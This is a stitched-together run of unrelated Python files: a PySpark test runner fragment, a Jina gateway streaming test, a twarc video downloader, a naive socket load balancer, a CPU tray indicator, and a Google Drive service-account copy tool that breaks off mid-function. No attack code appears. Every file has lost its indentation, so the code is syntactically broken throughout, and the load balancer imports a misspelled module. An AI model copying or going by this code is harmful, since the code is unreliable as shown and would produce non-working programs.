print(line, file=output, end=b'')
worker = Thread(target=consume_log, args=(per_test_output,))
worker.start() # This is essential as we need to consume the stdout pipe
retcode = process.wait()
shutil.rmtree(tmp_dir, ignore_errors=True)
except:
LOGGER.exception("Got exception while running %s with %s", test_name, pyspark_python)
# Here, we use os._exit() instead of sys.exit() in order to force Python to exit even if
# this code is invoked from a thread other than the main thread.
os._exit(-1)
duration = time.time() - start_time
worker.join() # Wait on the thread that consumed the output
# If it failed, append output to LOG_FILE, add to failed tests and carry on
if retcode != 0:
try:
with FAILURE_REPORTING_LOCK:
with open(LOG_FILE, 'ab') as log_file:
per_test_output.seek(0)
log_file.writelines(per_test_output)
per_test_output.seek(0)
for line in per_test_output:
decoded_line = line.decode()
if not re.match('[0-9]+', decoded_line):
print(decoded_line, end='')
per_test_output.close()
except:
LOGGER.exception("Got an exception while trying to print failed test output")
finally:
print_red("\nHad test failures in %s with %s; see logs." % (test_name, pyspark_python))
failed_tests_deque.append((test_name, pyspark_python))
else:
skipped_counts = 0
try:
per_test_output.seek(0)
            # This expects skipped-test output from unittest when the verbosity level is
            # 2 (i.e. when the --verbose option is enabled).
decoded_lines = map(lambda line: line.decode(), iter(per_test_output))
skipped_tests = list(filter(
lambda line: re.search(r'test_.* \(pyspark\..*\) ... skipped ', line),
decoded_lines))
skipped_counts = len(skipped_tests)
if skipped_counts > 0:
key = (pyspark_python, test_name)
SKIPPED_TESTS[key] = skipped_tests
per_test_output.close()
except:
import traceback
print_red("\nGot an exception while trying to store "
"skipped test output:\n%s" % traceback.format_exc())
# Here, we use os._exit() instead of sys.exit() in order to force Python to exit even if
# this code is invoked from a thread other than the main thread.
os._exit(-1)
if skipped_counts != 0:
LOGGER.info(
"Finished test(%s): %s (%is) ... %s tests were skipped", pyspark_python, test_name,
duration, skipped_counts)
else:
LOGGER.info(
"Finished test(%s): %s (%is)", pyspark_python, test_name, duration)
def get_default_python_executables():
python_execs = [x for x in ["python2.7", "python3.6", "pypy"] if which(x)]
if "python2.7" not in python_execs:
LOGGER.warning("Not testing against `python2.7` because it could not be found; falling"
" back to `python` instead")
python_execs.insert(0, "python")
return python_execs
def parse_opts():
parser = OptionParser(
prog="run-tests"
)
parser.add_option(
"--python-executables", type="string", default=','.join(get_default_python_executables()),
help="A comma-separated list of Python executables to test against (default: %default)"
)
parser.add_option(
"--modules", type="string",
default=",".join(sorted(python_modules.keys())),
help="A comma-separated list of Python modules to test (default: %default)"
)
parser.add_option(
"-p", "--parallelism", type="int", default=4,
help="The number of suites to test in parallel (default %default)"
)
parser.add_option(
"--verbose", action="store_true",
help="Enable additional debug logging"
)
group = OptionGroup(parser, "Developer Options")
group.add_option(
"--testnames", type="string",
default=None,
help=(
"A comma-separated list of specific modules, classes and functions of doctest "
"or unittest to test. "
"For example, 'pyspark.sql.foo' to run the module as unittests or doctests, "
"'pyspark.sql.tests FooTests' to run the specific class of unittests, "
"'pyspark.sql.tests FooTests.test_foo' to run the specific unittest in the class. "
"'--modules' option is ignored if they are given.")
)
parser.add_option_group(group)
(opts, args) = parser.parse_args()
if args:
parser.error("Unsupported arguments: %s" % ' '.join(args))
if opts.parallelism < 1:
parser.error("Parallelism cannot be less than 1")
return opts
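# Example invocation (illustrative; available module names come from
# sparktestsupport.modules, and 'pyspark-sql' is assumed here to be the name of
# the pyspark_sql module imported above):
#   python/run-tests.py --python-executables=python3.6 --modules=pyspark-sql -p 2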
def _check_coverage(python_exec):
    # Make sure coverage is installed.
try:
subprocess_check_output(
[python_exec, "-c", "import coverage"],
stderr=open(os.devnull, 'w'))
except:
print_red("Coverage is not installed in Python executable '%s' "
"but 'COVERAGE_PROCESS_START' environment variable is set, "
"exiting." % python_exec)
sys.exit(-1)
def main():
opts = parse_opts()
if opts.verbose:
log_level = logging.DEBUG
else:
log_level = logging.INFO
should_test_modules = opts.testnames is None
logging.basicConfig(stream=sys.stdout, level=log_level, format="%(message)s")
LOGGER.info("Running PySpark tests. Output is in %s", LOG_FILE)
if os.path.exists(LOG_FILE):
os.remove(LOG_FILE)
python_execs = opts.python_executables.split(',')
LOGGER.info("Will test against the following Python executables: %s", python_execs)
if should_test_modules:
modules_to_test = []
for module_name in opts.modules.split(','):
if module_name in python_modules:
modules_to_test.append(python_modules[module_name])
else:
print("Error: unrecognized module '%s'. Supported modules: %s" %
(module_name, ", ".join(python_modules)))
sys.exit(-1)
LOGGER.info("Will test the following Python modules: %s", [x.name for x in modules_to_test])
else:
testnames_to_test = opts.testnames.split(',')
LOGGER.info("Will test the following Python tests: %s", testnames_to_test)
task_queue = Queue.PriorityQueue()
for python_exec in python_execs:
        # Check if the python executable has coverage installed when the
        # 'COVERAGE_PROCESS_START' environment variable is set.
if "COVERAGE_PROCESS_START" in os.environ:
_check_coverage(python_exec)
python_implementation = subprocess_check_output(
[python_exec, "-c", "import platform; print(platform.python_implementation())"],
universal_newlines=True).strip()
LOGGER.debug("%s python_implementation is %s", python_exec, python_implementation)
LOGGER.debug("%s version is: %s", python_exec, subprocess_check_output(
[python_exec, "--version"], stderr=subprocess.STDOUT, universal_newlines=True).strip())
if should_test_modules:
for module in modules_to_test:
if python_implementation not in module.blacklisted_python_implementations:
for test_goal in module.python_test_goals:
heavy_tests = ['pyspark.streaming.tests', 'pyspark.mllib.tests',
'pyspark.tests', 'pyspark.sql.tests', 'pyspark.ml.tests']
if any(map(lambda prefix: test_goal.startswith(prefix), heavy_tests)):
priority = 0
else:
priority = 100
task_queue.put((priority, (python_exec, test_goal)))
else:
for test_goal in testnames_to_test:
task_queue.put((0, (python_exec, test_goal)))
# Create the target directory before starting tasks to avoid races.
target_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), 'target'))
if not os.path.isdir(target_dir):
os.mkdir(target_dir)
def process_queue(task_queue, failed_tests_deque):
while True:
try:
(priority, (python_exec, test_goal)) = task_queue.get_nowait()
except Queue.Empty:
break
try:
run_individual_python_test(target_dir, test_goal, python_exec, failed_tests_deque)
finally:
task_queue.task_done()
# Using a deque because it supports thread-safe appends
failed_tests_deque = deque()
start_time = time.time()
for _ in range(opts.parallelism):
worker = Thread(target=process_queue, args=(task_queue, failed_tests_deque))
worker.daemon = True
worker.start()
try:
task_queue.join()
except (KeyboardInterrupt, SystemExit):
print_red("Exiting due to interrupt")
sys.exit(-1)
total_duration = time.time() - start_time
if len(failed_tests_deque) != 0:
LOGGER.error("%i tests failed after %i seconds:", len(failed_tests_deque), total_duration)
for test_and_python in failed_tests_deque:
print_red("\nHad test failures in %s with %s; see logs." % test_and_python)
sys.exit(-1)
LOGGER.info("Tests passed in %i seconds", total_duration)
for key, lines in sorted(SKIPPED_TESTS.items()):
pyspark_python, test_name = key
LOGGER.info("\nSkipped tests in %s with %s:" % (test_name, pyspark_python))
for line in lines:
LOGGER.info(" %s" % line.rstrip())
if __name__ == "__main__":
main()
|
test_streaming.py
|
import asyncio
import copy
import multiprocessing
import os
import time
from datetime import datetime
from functools import partial
from typing import Dict
import pytest
from jina import Document, DocumentArray
from jina.clients import Client
from jina.helper import random_port
from jina.parsers import set_gateway_parser
from jina.serve import networking
from jina.serve.runtimes.gateway.grpc import GRPCGatewayRuntime
from jina.serve.runtimes.gateway.http import HTTPGatewayRuntime
from jina.serve.runtimes.gateway.websocket import WebSocketGatewayRuntime
INPUT_LEN = 4
INPUT_GEN_SLEEP_TIME = 1
SLOW_EXECUTOR_SLEEP_TIME = 5
@pytest.fixture
def simple_graph_dict_slow():
return {
'start-gateway': ['slow-executor'],
'slow-executor': ['end-gateway'],
}
@pytest.fixture
def simple_graph_dict_fast():
return {
'start-gateway': ['fast-executor'],
'slow-executor': ['end-gateway'],
}
@pytest.fixture
def simple_graph_dict_indexer():
return {
'start-gateway': ['indexer-executor'],
'slow-executor': ['end-gateway'],
}
class DummyMockConnectionPool:
def send_requests_once(
self,
requests,
deployment: str,
head: bool,
endpoint: str = None,
timeout: float = 1.0,
retries: int = -1,
) -> asyncio.Task:
assert head
request = requests[0]
if not hasattr(self, '_docs'):
self._docs = DocumentArray()
async def _compute_response():
response_msg = copy.deepcopy(request)
exec_endpoint = request.header.exec_endpoint
new_docs = DocumentArray()
await asyncio.sleep(0.1)
if deployment == 'indexer-executor':
if exec_endpoint == '/index':
time.sleep(0.1)
self._docs.extend(request.docs)
else:
docs = response_msg.docs
docs.clear()
docs.extend(
DocumentArray(Document(tags={'ids': self._docs[:, 'id']}))
)
response_msg.data.docs = docs
return response_msg
else:
if deployment == 'slow-executor':
await asyncio.sleep(SLOW_EXECUTOR_SLEEP_TIME)
for doc in request.docs:
new_doc = Document(doc, copy=True)
new_doc.tags['executor'] = time.time()
print(
f'in {deployment}, {new_doc.id} => time: {readable_time_from(new_doc.tags["executor"])}, {new_doc.tags["executor"]}',
flush=True,
)
new_docs.append(new_doc)
docs = response_msg.docs
docs.clear()
docs.extend(new_docs)
response_msg.data.docs = docs
return response_msg
async def task_wrapper():
response_msg = await _compute_response()
return response_msg, {}
return asyncio.create_task(task_wrapper())
def readable_time_from(t):
return datetime.utcfromtimestamp(t).strftime('%M:%S:%f')
def get_document(i, name):
t = time.time()
print(f'in {name} {i}, time: {readable_time_from(t)}, {t}', flush=True)
return Document(id=f'id-{i}', tags={'input_gen': t})
def blocking_gen():
"""Fast synchronous client generator"""
for i in range(INPUT_LEN):
yield get_document(i, name='blocking_gen')
time.sleep(0.1)
async def async_gen():
"""Fast async client generator"""
for i in range(INPUT_LEN):
yield get_document(i, name='async_gen')
await asyncio.sleep(0.1)
def slow_blocking_gen():
"""Slow synchronous client generator"""
for i in range(INPUT_LEN):
yield get_document(i, name='slow_blocking_gen')
time.sleep(INPUT_GEN_SLEEP_TIME)
async def slow_async_gen():
"""Slow async client generator"""
for i in range(INPUT_LEN):
yield get_document(i, name='slow_async_gen')
await asyncio.sleep(INPUT_GEN_SLEEP_TIME)
def on_done(response, final_da: DocumentArray):
docs = response.docs
for doc in docs:
doc.tags['on_done'] = time.time()
print(
f'in on_done {doc.id}, time: {readable_time_from(doc.tags["on_done"])}',
flush=True,
)
final_da.extend(docs)
def create_runtime(graph_dict: Dict, protocol: str, port: int, prefetch: int = 0):
import json
graph_description = json.dumps(graph_dict)
runtime_cls = None
if protocol == 'grpc':
runtime_cls = GRPCGatewayRuntime
elif protocol == 'http':
runtime_cls = HTTPGatewayRuntime
elif protocol == 'websocket':
runtime_cls = WebSocketGatewayRuntime
args = set_gateway_parser().parse_args(
[
'--port',
f'{port}',
'--graph-description',
f'{graph_description}',
'--deployments-addresses',
'{}',
'--prefetch',
f'{prefetch}',
]
)
with runtime_cls(args) as runtime:
runtime.run_forever()
@pytest.mark.parametrize(
'protocol, inputs',
[
('grpc', slow_async_gen),
pytest.param(
'grpc',
slow_blocking_gen,
marks=pytest.mark.skip(
reason='grpc client + sync generator with time.sleep is expected to fail'
),
),
('websocket', slow_async_gen),
('websocket', slow_blocking_gen),
('http', slow_async_gen),
('http', slow_blocking_gen),
],
)
def test_disable_prefetch_slow_client_fast_executor(
protocol, inputs, monkeypatch, simple_graph_dict_fast
):
monkeypatch.setattr(
networking.GrpcConnectionPool,
'send_requests_once',
DummyMockConnectionPool.send_requests_once,
)
port = random_port()
p = multiprocessing.Process(
target=create_runtime,
kwargs={
'protocol': protocol,
'port': port,
'graph_dict': simple_graph_dict_fast,
},
)
p.start()
time.sleep(1.0)
final_da = DocumentArray()
client = Client(protocol=protocol, port=port, return_responses=True)
client.post(
on='/',
inputs=inputs,
request_size=1,
on_done=lambda response: on_done(response, final_da),
)
p.terminate()
p.join()
assert len(final_da) == INPUT_LEN
# Since the input_gen is slow, order will always be gen -> exec -> on_done for every request
assert final_da['id-0'].tags['input_gen'] < final_da['id-0'].tags['executor']
assert final_da['id-0'].tags['executor'] < final_da['id-0'].tags['on_done']
assert final_da['id-0'].tags['on_done'] < final_da['id-1'].tags['input_gen']
assert final_da['id-1'].tags['input_gen'] < final_da['id-1'].tags['executor']
assert final_da['id-1'].tags['executor'] < final_da['id-1'].tags['on_done']
assert final_da['id-1'].tags['on_done'] < final_da['id-2'].tags['input_gen']
assert final_da['id-2'].tags['input_gen'] < final_da['id-2'].tags['executor']
assert final_da['id-2'].tags['executor'] < final_da['id-2'].tags['on_done']
assert final_da['id-2'].tags['on_done'] < final_da['id-3'].tags['input_gen']
assert final_da['id-3'].tags['input_gen'] < final_da['id-3'].tags['executor']
assert final_da['id-3'].tags['executor'] < final_da['id-3'].tags['on_done']
@pytest.mark.parametrize(
'protocol, inputs',
[
('grpc', async_gen),
('grpc', blocking_gen),
('websocket', async_gen),
('websocket', blocking_gen),
('http', async_gen),
('http', blocking_gen),
],
)
def test_disable_prefetch_fast_client_slow_executor(
protocol, inputs, monkeypatch, simple_graph_dict_slow
):
monkeypatch.setattr(
networking.GrpcConnectionPool,
'send_requests_once',
DummyMockConnectionPool.send_requests_once,
)
port = random_port()
final_da = DocumentArray()
p = multiprocessing.Process(
target=create_runtime,
kwargs={
'protocol': protocol,
'port': port,
'graph_dict': simple_graph_dict_slow,
},
)
p.start()
time.sleep(1.0)
client = Client(protocol=protocol, port=port, return_responses=True)
client.post(
on='/',
inputs=inputs,
request_size=1,
on_done=lambda response: on_done(response, final_da),
)
p.terminate()
p.join()
assert len(final_da) == INPUT_LEN
    # since the Executor is slow, all client inputs should be read before the 1st request exits the Executor.
assert (
final_da['id-0'].id < final_da['id-1'].id
), f'ids are not ordered with times {final_da["id-0"].tags["input_gen"]} and {final_da["id-1"].tags["input_gen"]}'
assert (
final_da['id-1'].id < final_da['id-2'].id
), f'ids are not ordered with times {final_da["id-1"].tags["input_gen"]} and {final_da["id-2"].tags["input_gen"]}'
assert (
final_da['id-2'].id < final_da['id-3'].id
), f'ids are not ordered with times {final_da["id-2"].tags["input_gen"]} and {final_da["id-3"].tags["input_gen"]}'
assert final_da['id-0'].tags['input_gen'] < final_da['id-1'].tags['input_gen']
assert final_da['id-1'].tags['input_gen'] < final_da['id-2'].tags['input_gen']
assert final_da['id-2'].tags['input_gen'] < final_da['id-3'].tags['input_gen']
assert final_da['id-3'].tags['input_gen'] < final_da['id-0'].tags['executor']
    # At least 1 request should reach `on_done` before all requests are processed in the Executor.
# Validates that the requests are not pending at the Executor
first_on_done_time = min(i.tags['on_done'] for i in final_da)
last_executor_time = max(i.tags['executor'] for i in final_da)
assert first_on_done_time < last_executor_time
@pytest.mark.parametrize('prefetch', [0, 5])
@pytest.mark.parametrize('protocol', ['websocket', 'http', 'grpc'])
def test_multiple_clients(prefetch, protocol, monkeypatch, simple_graph_dict_indexer):
GOOD_CLIENTS = 5
GOOD_CLIENT_NUM_DOCS = 20
MALICIOUS_CLIENT_NUM_DOCS = 50
def get_document(i):
return Document(
id=f'{multiprocessing.current_process().name}_{i}',
text=str(bytes(bytearray(os.urandom(512 * 4)))),
)
async def good_client_gen():
for i in range(GOOD_CLIENT_NUM_DOCS):
yield get_document(i)
await asyncio.sleep(0.1)
async def malicious_client_gen():
for i in range(1000, 1000 + MALICIOUS_CLIENT_NUM_DOCS):
yield get_document(i)
def client(gen, port):
Client(protocol=protocol, port=port).post(
on='/index', inputs=gen, request_size=1, return_responses=True
)
monkeypatch.setattr(
networking.GrpcConnectionPool,
'send_requests_once',
DummyMockConnectionPool.send_requests_once,
)
port = random_port()
pool = []
runtime_process = multiprocessing.Process(
target=create_runtime,
kwargs={
'protocol': protocol,
'port': port,
'graph_dict': simple_graph_dict_indexer,
'prefetch': prefetch,
},
)
runtime_process.start()
time.sleep(1.0)
# We have 5 good clients connecting to the same gateway. They have controlled requests.
# Each client sends `GOOD_CLIENT_NUM_DOCS` (20) requests and sleeps after each request.
for i in range(GOOD_CLIENTS):
cp = multiprocessing.Process(
target=partial(client, good_client_gen, port),
name=f'goodguy_{i}',
)
cp.start()
pool.append(cp)
    # and 1 malicious client, sending a lot of requests (trying to block others)
cp = multiprocessing.Process(
target=partial(client, malicious_client_gen, port),
name='badguy',
)
cp.start()
pool.append(cp)
for p in pool:
p.join()
order_of_ids = list(
Client(protocol=protocol, port=port, return_responses=True)
.post(on='/status', inputs=[Document()])[0]
.docs[0]
.tags['ids']
)
    # There must be a total of 150 docs indexed.
runtime_process.terminate()
runtime_process.join()
assert (
len(order_of_ids)
== GOOD_CLIENTS * GOOD_CLIENT_NUM_DOCS + MALICIOUS_CLIENT_NUM_DOCS
)
"""
    If prefetch is set, each Client is allowed at most `prefetch` (5) outstanding requests at a time.
    Since requests are controlled, `badguy` has to do the last 20 requests.
    If prefetch is disabled, clients can send requests freely and no client is blocked,
    hence the last 20 requests come from `goodguy`.
    (Ideally the last 30 requests should be validated; to avoid flaky CI, we test the last 20.)
    When there are no rules, badguy wins! With a rule, you find balance in the world.
"""
if protocol == 'http':
# There's no prefetch for http.
assert set(map(lambda x: x.split('_')[0], order_of_ids[-20:])) == {'goodguy'}
elif prefetch == 5:
assert set(map(lambda x: x.split('_')[0], order_of_ids[-20:])) == {'badguy'}
elif prefetch == 0:
assert set(map(lambda x: x.split('_')[0], order_of_ids[-20:])) == {'goodguy'}
|
twarc_videos.py
|
import os
import sys
import json
import time
import click
import logging
import youtube_dl
import multiprocessing as mp
from urllib.parse import urlparse
from twarc import ensure_flattened
from datetime import datetime, timedelta
from youtube_dl.utils import match_filter_func
@click.command()
@click.option('--max-downloads', type=int, help='max downloads per URL')
@click.option('--max-filesize', type=int, help='max filesize to download (bytes)')
@click.option('--ignore-livestreams', is_flag=True, default=False, help='ignore livestreams')
@click.option('--download-dir', type=str, default='videos', help='directory to download to')
@click.option('--block', multiple=True, help='hostname(s) to block (repeatable)')
@click.option('--timeout', type=int, default=120, help='seconds to wait for a video download to finish')
@click.option('--quiet', is_flag=True, default=False, help='silence terminal output')
@click.argument('infile', type=click.File('r'), default='-')
def videos(max_downloads, max_filesize, ignore_livestreams, download_dir, block, timeout, infile, quiet):
"""
Download videos referenced in tweets and their metadata.
"""
    # make download directory
    if not os.path.isdir(download_dir):
        os.mkdir(download_dir)
# setup logger
log_file = "{}/twarc-videos.log".format(download_dir)
logging.basicConfig(filename=log_file, level=logging.INFO)
log = logging.getLogger()
# setup youtube_dl config
ydl_opts = {
"format": "best",
"logger": log,
"restrictfilenames": True,
"ignoreerrors": True,
"nooverwrites": True,
"writedescription": True,
"writeinfojson": True,
"writesubtitles": True,
"writeautomaticsub": True,
"outtmpl": "{}/%(extractor)s/%(id)s/%(title)s.%(ext)s".format(download_dir),
"download_archive": "{}/archive.txt".format(download_dir)
}
if ignore_livestreams:
ydl_opts["matchfilter"] = match_filter_func("!is_live")
if max_downloads:
ydl_opts['max_downloads'] = max_downloads
if max_filesize:
ydl_opts['max_filesize'] = max_filesize
# keep track of domains to block
blocklist = []
if block:
blocklist = block
    # read in existing mapping file to know which urls we can ignore
seen = set()
mapping_file = os.path.join(download_dir, 'mapping.tsv')
if os.path.isfile(mapping_file):
for line in open(mapping_file):
url, path = line.split('\t')
log.info('found %s in %s', url, mapping_file)
seen.add(url)
# loop through the tweets
results = open(mapping_file, 'a')
for line in infile:
for tweet in ensure_flattened(json.loads(line)):
log.info('analyzing %s', tweet['id'])
for url in video_urls(tweet):
if url in seen:
log.info('already processed %s', url)
continue
seen.add(url)
# check for blocks
uri = urlparse(url)
if uri.netloc in blocklist:
                    log.warning("%s in block list", url)
continue
log.info('processing %s', url)
manager = mp.Manager()
return_list = manager.list()
p = mp.Process(target=download, args=(url, ydl_opts, log, max_downloads, return_list))
p.start()
started = datetime.now()
while True:
# if we've exceeded the timeout terminate the process
if timeout and datetime.now() - started > timedelta(seconds=timeout):
log.warning('reached timeout %s', timeout)
p.terminate()
break
# if the process is done we can stop
elif not p.is_alive():
break
                    # otherwise sleep and then check again
time.sleep(1)
p.join()
                # if the list is empty there either wasn't a download or it timed out
filename = return_list.pop() if len(return_list) > 0 else None
if not quiet and filename:
click.echo(f'downloaded {click.style(url, fg="blue")} as {click.style(filename, fg="green")}')
# write the result to the mapping file
results.write("{}\t{}\n".format(url, filename))
def video_urls(t):
if 'entities' not in t:
return
# if video is attached to the tweet return the tweet url
attachments = t['entities'].get('attachments', {})
for media in attachments.get('media', []):
if media['type'] == 'video':
yield f"https://twitter.com/{t['author']['username']}/status/{t['id']}"
# return every url in a tweet to see if video can be extracted
for url in t['entities'].get('urls', []):
yield url['expanded_url']
def download(url, ydl_opts, log, max_downloads, return_list):
try:
ydl = youtube_dl.YoutubeDL(ydl_opts)
info = ydl.extract_info(url)
if info:
filename = ydl.prepare_filename(info)
if os.path.isfile(filename):
return_list.append(filename)
logging.info('downloaded %s as %s', url, filename)
else:
logging.warning("%s doesn't look like a video", url)
except youtube_dl.utils.MaxDownloadsReached as e:
logging.warning('only %s downloads per url allowed', max_downloads)
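# Illustrative usage (file name is hypothetical): feed flattened tweet JSON
# collected with twarc either on stdin or as a file argument, e.g.
#   python twarc_videos.py --download-dir videos --timeout 60 tweets.jsonl
#   cat tweets.jsonl | python twarc_videos.py --ignore-livestreams --block youtube.com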
|
libra.py
|
# Main file defining Libra, a select()-based socket server that accepts requests.
# This implementation is naive and needs to be optimized.
import select, queue, math
import socket, sys, random, client
import threading, reques
import time
counter = 1
weight = 0
class Libra:
def __init__(self):
self._redirects = []
self.outputs = []
self.message_queues = {}
self.inputs = []
self._weight = 5
def listen(self,address,port):
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
self.server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.server.setblocking(0)
self.server.bind((address, port))
self.server.listen(5)
self.inputs = [self.server]
print('\n\n')
print(' Server listening on: '+address+':'+str(port))
time.sleep(1)
print('\n')
def start(self):
global counter
global weight
n = 0
weight = self._weight
if len(self._redirects) > 0:
print('\n')
print(' Libra started waiting for requests...')
print('\n')
while self.inputs:
readable, writable, exceptional = select.select(self.inputs, self.outputs, self.message_queues)
for s in readable:
if s is self.server:
self.connection, client_address = s.accept()
self.connection.setblocking(0)
self.inputs.append(self.connection)
self.message_queues[self.connection] = queue.Queue()
else:
data = str(s.recv(1024))
if data:
self.message_queues[s].put(data)
if s not in self.outputs:
self.outputs.append(s)
else:
if s in self.outputs:
self.outputs.remove(s)
self.inputs.remove(s)
s.close()
del self.message_queues[s]
for s in writable:
try:
next_msg = self.message_queues[s].get_nowait()
print(' Request from: '+ str(client_address))
                    except queue.Empty:
                        self.outputs.remove(s)
                        # nothing queued for this socket; move on to the next writable socket
                        continue
if next_msg != '':
if len(self._redirects) > 0:
for el in self._redirects:
try:
client.connect(socket.gethostbyname(el))
except SystemExit:
self._redirects.remove(el)
if len(self._redirects) > 0:
if(reques.http(next_msg)):
test = math.inf
if(counter > weight):
try:
self._redirects[n+1]
n += 1
weight = self._weight + weight
except IndexError:
n = 0
counter = 1
weight = self._weight
r = 'HTTP/1.1 301 Moved Permanently\r\nServer: Libra\r\nRetry-After: 1\r\nLocation: https://'+str(self._redirects[n])+'\r\n'
counter += 1
print(' Redirected to: '+str(self._redirects[n]))
s.send(str.encode(r))
if s in self.outputs:
self.outputs.remove(s)
self.inputs.remove(s)
s.close()
del self.message_queues[s]
else:
print(' No servers available, change the redirects list.')
for s in exceptional:
self.inputs.remove(s)
if s in self.outputs:
self.outputs.remove(s)
s.close()
del self.message_queues[s]
else:
print(' No redirects list, use add method.')
self.server.close()
print(' Server closed.\n')
sys.exit(0)
def thread(self):
for i in range(10):
            t = threading.Thread(target=self.start)  # pass the method itself so each thread runs start()
t.start()
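# Illustrative usage sketch (hostnames are hypothetical; the project's add()
# helper referenced in start() is the intended way to populate the redirects
# list, but its signature is not shown here, so the list is set directly):
#   lb = Libra()
#   lb._redirects = ['backend-a.example.org', 'backend-b.example.org']
#   lb.listen('127.0.0.1', 8080)
#   lb.start()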
|
cpu_indicator.pyw
|
import time
from threading import Thread
import pystray
from PIL import Image, ImageDraw, ImageFont
from psutil import cpu_percent
class Indicator:
# changeable variables
REFRESH_INTERVAL = 0.5
FONT_SIZE = 200
ICON_RES = 250, 250
FONT = ImageFont.truetype('arial.ttf', FONT_SIZE)
BLUE_BG = Image.new('RGB', ICON_RES, color=(61, 75, 129))
RED_BG = Image.new('RGB', ICON_RES, color=(255, 0, 0))
def __init__(self):
self.icon = pystray.Icon("usage", title="CPU Usage")
self.icon.menu = pystray.Menu(pystray.MenuItem('Exit', lambda: self.exit_action()))
self.refresh_icon_thread = None
# this is so that our icon refresher thread knows when to stop
self.stopped = False
def exit_action(self):
self.icon.stop()
self.stopped = True
def refresh_icon(self):
while True:
if self.stopped is True:
return
            # ceil the usage without the math lib
            # to decrease the size of the .exe file
            # (this most likely didn't help at all);
            # e.g. 12.3 -> -(-12.3 // 1) == -(-13.0) == 13
usage = cpu_percent(interval=0)
usage = int(- (-usage // 1))
# decide bg depending on usage
image = self.RED_BG.copy() if usage > 70 else self.BLUE_BG.copy()
# draw the usage text over bg
draw = ImageDraw.Draw(image)
draw.text(
# center the usage text
xy=(
self.ICON_RES[0] / 2,
self.ICON_RES[1] / 2
),
anchor="mm", # https://pillow.readthedocs.io/en/stable/handbook/text-anchors.html#text-anchors
text=str(usage),
font=self.FONT,
fill=(255, 255, 255),
)
self.icon.icon = image
time.sleep(self.REFRESH_INTERVAL)
def start(self):
self.refresh_icon_thread = Thread(daemon=True, target=self.refresh_icon)
self.refresh_icon_thread.start()
# wait a bit so that an icon is set
time.sleep(0.5)
self.icon.run()
self.refresh_icon_thread.join()
Indicator().start()
|
task.py
|
from core.function import *
from core.sa import *
from core.tools import *
import queue
import threading
import time
def AsynListAll(worker=1):
"""ListAll 获取指定文件夹下的所有子文件夹以及相关文件
Args:
service ([type]): 服务账号信息
"""
assert worker > 0, "工作线程必须大于0"
status_with_exit = [False] * worker
lock = threading.Lock()
def task(index):
sa_info = SAManage.request()
service = sa_info.service
while (not all(status_with_exit)):
while ((Global.SearchFolderQueue.qsize() > 0)
and (not Global.isExit)):
current_folder = Global.SearchFolderQueue.get()
lock.acquire()
status_with_exit[index] = False
lock.release()
files = []
try:
files = ListCurrent(service, current_folder)
Global.add_folder_information(current_folder)
except Exception as e:
Global.logger.error(str(e))
Global.SearchFolderQueue.put(current_folder)
sa_info.cum_error += 1
SAManage.recycle(sa_info)
sa_info = SAManage.request()
service = sa_info.service
continue
for sub_file_info in files:
#sub_file_info = FileInfo(sub_file_info)
sub_file_info.parent = current_folder.uid
if (sub_file_info.is_folder):
                        # add the folder to the search queue
Global.SearchFolderQueue.put(sub_file_info)
else:
                        # add the file to the copy queue
Global.CreateFileQueue.put(sub_file_info)
status_with_exit[index] = True
time.sleep(1)
SAManage.recycle(sa_info)
threads = []
for i in range(worker):
t = threading.Thread(target=task, args=(i, ))
        t.start()  # start the thread, i.e. let it begin running
threads.append(t)
for t in threads:
t.join()
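# Illustrative driving pattern (this is how SyncBackup below uses it): seed the
# global search queue with a folder's FileInfo (e.g. obtained via Get()) and
# then fan out the listing work:
#   Global.SearchFolderQueue.put(folder_info)
#   AsynListAll(worker=4)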
def AsynSaveTo(src: str, dst: str, worker=1, is_first=True):
    assert worker > 0, "worker count must be greater than 0"
status_with_exit = [False] * worker
lock = threading.Lock()
if (is_first):
# sa_info = SAManage.request()
# service = sa_info.service
# src_info = AddFirst(service, src, dst)
# SAManage.recycle(sa_info)
src_info = None
with SAManage.request() as sa_info:
service = sa_info.service
src_info = AddFirst(service, src, dst)
AsynListAll(worker=worker)
    Global.add_create_folder(src_info)  # put the top-level target folder into the folder-creation queue
parent2children = get_all_children(Global.SearchInformation,
src_info.parent)
if (Global.isExit):
return
def task_1(index):
"""task_1 创建文件夹
Args:
index ([type]): 线程标志
"""
sa_info = SAManage.request()
service = sa_info.service
while (not all(status_with_exit)):
while ((Global.CreateFolderQueue.qsize() > 0)
and (not Global.isExit)):
cur_info = Global.CreateFolderQueue.get()
lock.acquire()
status_with_exit[index] = False
lock.release()
try:
res_uid = CreateFolder(service, cur_info,
Global.Parallelism[cur_info.parent])
Global.Parallelism[cur_info.uid] = res_uid
                    # add the current folder's sub-folders to the folder-creation queue
for uid in parent2children[cur_info.uid]:
if uid == cur_info.uid:
continue
Global.add_create_folder(Global.SearchInformation[uid])
except Exception as e:
print("{0} 触发错误, 无法创建文件夹: {1}".format(sa_info.uid, str(e)))
Global.logger.error(str(e))
Global.CreateFolderQueue.put(cur_info)
sa_info.cum_error += 1
SAManage.recycle(sa_info)
sa_info = SAManage.request()
service = sa_info.service
status_with_exit[index] = True
time.sleep(1)
SAManage.recycle(sa_info)
def task_2(index):
"""task_2 拷贝文件
Args:
index ([type]): 线程标识
"""
sa_info = SAManage.request()
service = sa_info.service
while (not all(status_with_exit)):
while ((Global.CreateFileQueue.qsize() > 0)
and (not Global.isExit)):
cur_info = Global.CreateFileQueue.get()
#print(cur_info.name)
lock.acquire()
status_with_exit[index] = False
lock.release()
try:
string = "thread: {0}\tcopy file {1}".format(
index, cur_info.name)
Global.logger.info(string)
Copy(service, cur_info.uid,
Global.Parallelism[cur_info.parent])
except Exception as e:
print("{0} 触发错误, 无法拷贝文件".format(sa_info.uid))
Global.logger.error(str(e))
Global.CreateFileQueue.put(cur_info)
sa_info.cum_error += 1
SAManage.recycle(sa_info)
sa_info = SAManage.request()
service = sa_info.service
status_with_exit[index] = True
time.sleep(1)
SAManage.recycle(sa_info)
threads = []
for i in range(worker):
t = threading.Thread(target=task_1, args=(i, ))
        t.start()  # start the thread, i.e. let it begin running
threads.append(t)
for t in threads:
t.join()
status_with_exit = [False] * worker
threads = []
for i in range(worker):
t = threading.Thread(target=task_2, args=(i, ))
        t.start()  # start the thread, i.e. let it begin running
threads.append(t)
for t in threads:
t.join()
def SyncBackup(src: str, dst: str, worker=1, is_first=True):
src_info = None
dst_info = None
with SAManage.request() as sa_info:
